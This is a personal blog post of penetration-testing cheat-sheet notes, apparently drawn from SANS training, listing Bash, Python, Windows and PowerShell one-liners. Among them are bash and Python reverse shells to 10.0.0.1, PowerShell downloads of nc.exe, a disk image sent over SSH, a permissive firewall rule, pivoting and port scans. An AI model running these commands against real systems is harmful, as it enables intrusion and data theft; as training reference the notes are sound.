We’re moving house, so the old SANS Pentesing posters and notes are headed for the recycle bin :(
I wouldn’t bother reading this post if i was you. Visit SANS.org or Google for “SANS posters”. They’re much better than anything here. Or, better still, do SANS 660.
Bash Notes
Pivot across the network via IPv6. Allow your IPv4 tools to work with IPv6.
sudo socat TCP-LISTEN:8080,reuseaddr,fork TCP6:[fe80::6bb8:6aaa:fe40:9864]:80
then
nikto -host 127.0.0.1 -port 8080
Whats my IP on this machine? curl -4 icanhazip.com
or dig +short myip.opendns.com @resolver1.opendns.com
or wget -qO- ifconfig.me/ip
Compress a partition and SSH it elsewhere
dd if=/dev/rdisk0s1s2 bs=65536 conv=noerror,sync | ssh -C me@10.0.0.0 "cat >/tmpimage.dd"
The bash reverse shell bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
Encode echo "test" | base64
and Decode echo "dGVzdAo=" | base64 -d
Quick website clone wget -r -nH $URL
Python
Upgrade your raw shell python -c 'import pty; pty.spawn("/bin/bash")'
Python reverse Shell:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Python 2 web server python -m SimpleHTTPServer 8888
, Python 3 python -m http.server 8888
Python web client
python3 -c 'import urllib.request; urllib.request.urlretrieve("http://192.168.1.1","/tmp/thething.html")'
Debug python -m pdb exploit.py
Windows
Turn a windows box into a wireless access point
netsh wlan set hostednetwork mode=allow ssid=nothingsketchy key=mypass && netsh wlan start hostednetwork
Build an IPv6 pivot
netsh interface portproxy add v4tov6 listenport=8080 listenaddress=0.0.0.0 connectport=<RPort> connectaddress=<RHost>
Keep an eye on network connections to the machine netstat -naob 1 | find "<ip or port>"
Process list: wmic process list full
Tasks and Services: tasklist /svc
PowerShell
Ping all the things
1..255 | % { echo "192.168.1.$_"; ping -n 1 -w 100 192.168.1.$_ | select-string ttl}
The PS Web Client
(cheeky way since Windows 8) wget "http://10.0.0.1/nc.exe" -outfile "c:\temp\nc.exe"
But you should probably also know: (New-Object System.Net.WebClient).DownloadFile("http://10.0.0.1/nc.exe", "c:\temp\nc.exe")
Check Firewall Rules: get-NetFirewallRule -all
or get-netfirewallrule -all | export-csv "mycsv.csv"
Modify Firewall Rules: New-NetFirewallRule -action Allow -displayname LegitException -remoteAddress 10.10.10.10
Scan: 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).connect("<IP>",$_)) "Port $_ is open"} 2>$null